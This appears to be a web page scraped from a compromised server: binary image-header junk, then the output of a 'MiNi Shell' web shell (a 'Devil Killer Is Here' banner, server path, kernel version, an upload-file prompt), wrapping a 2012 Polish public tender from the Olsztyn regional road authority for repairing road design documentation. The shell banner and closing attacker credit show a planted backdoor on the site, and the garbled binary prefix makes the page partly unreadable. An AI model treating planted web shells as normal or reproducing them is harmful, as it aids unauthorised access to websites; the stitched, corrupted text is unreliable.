JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/418070-N-2012.html

<p class="kh_header"><b>Olsztyn: Naprawa dokumentacji projektowej z podziałem na 2 części</b><br>
<b>Numer ogłoszenia: 418070 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Pstrowskiego 28b, 10-602 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5346265 w. 22, faks 089 5399876.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.olsztyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> NIE DOTYCZY</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa dokumentacji projektowej z podziałem na 2 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Naprawa dokumentacji projektowej z podziałem na 2 części : 

CZĘŚĆ NR 1
Rozbudowa drogi wojewódzkiej nr 591 Gr. Państwa - Barciany - Kętrzyn - Mrągowo koło msc. Łazdoje pomiędzy km 42+600 a km 43+600 (wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej) - naprawa projektu budowlanego i wykonawczego.
Dokumentacja powinna zawierać :
1)mapę do celów projektowych aktualizacja			 - 1 egz.,
2)projekt budowlany 					 - 6 egz.,
3)projekt wykonawczy branży drogowej			 - 6 egz.,
4)docelowy projekt stałej organizacji ruchu			 - 4 egz.,
5)projekt organizacji ruchu na czas robót			 - 4 egz. 
6)informacja do sporządzenia planu BIOZ	 		 - 4 egz.,
7)szczegółowe specyfikacje techniczne			 - 4 egz.,
8)kosztorys ofertowy			 		 - 2 egz.,
9)kosztorys inwestorski					 - 2 egz.,
10)wersję elektroniczną na CD				 - 2 egz.,
      w asortymentach:
   - specyfikacja techniczna i opisy (Word)
   - kosztorysy (Excel)
   - rysunki i plany (PDF).
11)pełna dokumentacja geodezyjno-prawna niezbędna do nabycia nieruchomości,
w tym koszty podziału ok. 2 działek				- 1 kpl.,
12)wszystkie niezbędne materiały do uzyskania decyzji o zgodzie na 
 realizację inwestycji drogowej wraz z decyzją i wymaganymi pozwoleniami - 1 kpl. 

CZĘŚĆ NR 2
Rozbudowa skrzyżowania drogi wojewódzkiej nr 591 Gr. Państwa - Barciany - Kętrzyn - Mrągowo z drogą powiatową nr 1699N Św. Lipka - Szestno w km 52+650 (wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej) - naprawa projektu budowlanego i wykonawczego.
Dokumentacja powinna zawierać :
1)mapę do celów projektowych aktualizacja			 - 1 egz.,
2)projekt budowlany 					 - 6 egz.,
3)projekt wykonawczy branży drogowej	              	 - 6 egz.,
4)docelowy projekt stałej organizacji ruchu			 - 4 egz.,
5)projekt organizacji ruchu na czas robót			 - 4 egz. 
6)informacja do sporządzenia planu BIOZ			 - 4 egz.,
7)szczegółowe specyfikacje techniczne			 - 4 egz.,
8)kosztorys ofertowy					 - 2 egz.,
9)kosztorys inwestorski					 - 2 egz.,
10)wersję elektroniczną na CD			 	 - 2 egz.,
      w asortymentach:
   - specyfikacja techniczna i opisy (Word)
   - kosztorysy (Excel)
   - rysunki i plany (PDF).
11)pełna dokumentacja geodezyjno-prawna niezbędna do nabycia nieruchomości,
w tym koszty podziału ok. 2 działek				- 1 kpl.,
12)wszystkie niezbędne materiały do uzyskania decyzji o zgodzie na 
 realizację inwestycji drogowej wraz z decyzją i wymaganymi pozwoleniami - 1 kpl..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 	Zasady wnoszenia wadium
          1.	Wadium w wysokości : 
Część nr 1 - 657,00 PLN, (słownie złotych : sześćset pięćdziesiąt siedem 00/100);
Część nr 2 - 558,00 PLN, (słownie złotych : pięćset pięćdziesiąt osiem 00/100).   

powinno być wniesione przed upływem terminu składania ofert. Nie wniesienie wadium w wymaganym terminie spowoduje wykluczenie Wykonawcy z ubiegania się o udzielenie zamówienia publicznego, zgodnie z art. 24 ust. 2 pkt. 2) ustawy Pzp. 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	w  pieniądzu - przelewem lub wpłatą na rachunek Zamawiającego w Banku Polska Kasa Opieki SA,  nr r-ku 18-1240-1590-1111-0010-3433-9153 z adnotacją:  Wadium - nr sprawy ZDW-NZP/3220/175/2012 - Naprawa dokumentacji projektowej z podziałem na 2 części - CZĘŚĆ NR  Wadium  wniesione  w  formie  pieniężnej  winno  znaleźć  się na koncie Zamawiającego przed upływem terminu składania ofert (kserokopię  przelewu  lub  dowodu  wpłaty włączyć do oferty);
2)	w formach niepieniężnych:
a)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z   tym  że  poręczenie  kasy  jest  zawsze   poręczeniem pieniężnym,
b)	gwarancjach bankowych,
c)	w gwarancjach ubezpieczeniowych,
d)	w   poręczeniach   udzielanych   przez   podmioty, o   których   mowa w  art. 6b ust. 5 pkt. 2  ustawy  z  dnia  9  listopada  2000 r.  o  utworzeniu  Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz.U. z 2007 r., Nr 42, poz. 275, z późn. zm.).
3.	Wadium wniesione w pieniądzu (PLN) Zamawiający przechowuje na rachunku bankowym. 
4.	Jeżeli wadium zostanie wniesione w formie niepieniężnej, kserokopia takiego dokumentu powinna stanowić integralną część oferty, natomiast oryginał dokumentu winien być dołączony do oferty tak, aby można byłoby przekazać go do depozytu w Wydziale Finansowym ZDW Olsztyn, bez potrzeby rozpinania oferty.
5.	Wadium wniesione w formie niepieniężnej musi obejmować cały okres związania ofertą określony w pkt. 3 ppkt. 6 SIWZ.
6.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (Poręczyciela). Gwarancja (Poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
7.	Wadium wniesione w formie niepieniężnej musi mieć taką samą płynność jak wadium wniesione w pieniądzu, co oznacza, że dochodzenie roszczeń Zamawiającego nie może być utrudnione. Wadium wniesione w formie niepieniężnej uważane będzie za spełnione, jeżeli z treści dokumentu wynikać będzie, że interesy Zamawiającego w zakresie roszczenia o wypłatę wadium są zabezpieczone w okolicznościach wymienionych w art. 46 ust. 4a i ust. 5 ustawy, a Gwarant (Poręczyciel) bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, wypłaci Zamawiającemu pełną kwotę wadium po zaistnieniu tychże okoliczności.
8.	Wykonawca, który nie wniesie wadium w wysokości określonej w pkt. 4.1.1) SIWZ  lub dopuszczonej formie zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.

2.   Zasady zwrotu wadium
1.	Zamawiający zwraca wadium:
1)	wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza z zastrzeżeniem pkt 4 ppkt. 3 SIWZ;
2)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano;
3)	niezwłocznie, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
2.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
3.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 4 ppkt. 2.1.1) SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

3.   Utrata wadium
1.	Zgodnie z art. 46 ust. 4a ustawy Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

2.	Zgodnie z art. 46 ust. 5 ustawy Pzp Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	zamawiający nie precyzuje w tym zakresie szczególnych wymagań .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Wykonawcy muszą wykazać że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje w tym zakresie szczególnych wymagań .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Wykonawcy muszą wykazać, że dysponują lub będą dysponować 1 osobą kadry technicznej do wykonywania funkcji projektanta, posiadającego uprawnienia do projektowania w branży drogowej, o doświadczeniu zawodowym min. 3 lata.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>A)  zmiany wynagrodzenia Wykonawcy, w przypadku:
a)	rezygnacji z części usług, jeżeli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy;
B) zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku:
a)	zdarzeń losowych,
b)	polecenia Zamawiającego;
c)	uzasadnionego wystąpienia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Kętrzynie, ul. Bałtycka 20, 11-400 Kętrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 09:30, miejsce: Rejon Dróg Wojewódzkich w Kętrzynie, ul. Bałtycka 20, 11-400 Kętrzyn, POKÓJ NR 22 (SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbudowa dr woj nr 591 koło msc. Łazdoje pomiędzy km 42+600 a km 43+600 (wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej) - naprawa projektu budowlanego i wykonawczego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbudowa drogi wojewódzkiej nr 591 Gr. Państwa - Barciany - Kętrzyn - Mrągowo koło msc. Łazdoje pomiędzy km 42+600 a km 43+600 (wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej) - naprawa projektu budowlanego i wykonawczego.
Dokumentacja powinna zawierać :
1)mapę do celów projektowych aktualizacja			 - 1 egz.,
2)projekt budowlany 					 - 6 egz.,
3)projekt wykonawczy branży drogowej			 - 6 egz.,
4)docelowy projekt stałej organizacji ruchu			 - 4 egz.,
5)projekt organizacji ruchu na czas robót			 - 4 egz. 
6)informacja do sporządzenia planu BIOZ			 - 4 egz.,
7)szczegółowe specyfikacje techniczne			 - 4 egz.,
8)kosztorys ofertowy					 - 2 egz.,
9)kosztorys inwestorski			 		 - 2 egz.,
10)wersję elektroniczną na CD			 	 - 2 egz.,
      w asortymentach:
   - specyfikacja techniczna i opisy (Word)
   - kosztorysy (Excel)
   - rysunki i plany (PDF).
11)pełna dokumentacja geodezyjno-prawna niezbędna do nabycia nieruchomości,
w tym koszty podziału ok. 2 działek				- 1 kpl.,
12)wszystkie niezbędne materiały do uzyskania decyzji o zgodzie na 
 realizację inwestycji drogowej wraz z decyzją i wymaganymi pozwoleniami - 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozbudowa skrzyżowania dr woj nr 591 z dr powiatową nr 1699N Św. Lipka - Szestno w km 52+650 (wraz z uzyskaniem decyzji 
o zezwoleniu na realizację inwestycji drogowej) - naprawa projektu budowlanego i wykonawczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbudowa skrzyżowania drogi wojewódzkiej nr 591 Gr. Państwa - Barciany - Kętrzyn - Mrągowo  z drogą powiatową nr 1699N Św. Lipka - Szestno w km 52+650 (wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej) - naprawa projektu budowlanego i wykonawczego.
Dokumentacja powinna zawierać :
1)mapę do celów projektowych aktualizacja			 - 1 egz.,
2)projekt budowlany 					 - 6 egz.,
3)projekt wykonawczy branży drogowej			 - 6 egz.,
4)docelowy projekt stałej organizacji ruchu			 - 4 egz.,
5)projekt organizacji ruchu na czas robót			 - 4 egz. 
6)informacja do sporządzenia planu BIOZ			 - 4 egz.,
7)szczegółowe specyfikacje techniczne			 - 4 egz.,
8)kosztorys ofertowy			 		 - 2 egz.,
9)kosztorys inwestorski					 - 2 egz.,
10)wersję elektroniczną na CD			 	 - 2 egz.,
      w asortymentach:
   - specyfikacja techniczna i opisy (Word)
   - kosztorysy (Excel)
   - rysunki i plany (PDF).
11)pełna dokumentacja geodezyjno-prawna niezbędna do nabycia nieruchomości,
w tym koszty podziału ok. 2 działek				- 1 kpl.,
12)wszystkie niezbędne materiały do uzyskania decyzji o zgodzie na 
 realizację inwestycji drogowej wraz z decyzją i wymaganymi pozwoleniami - 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com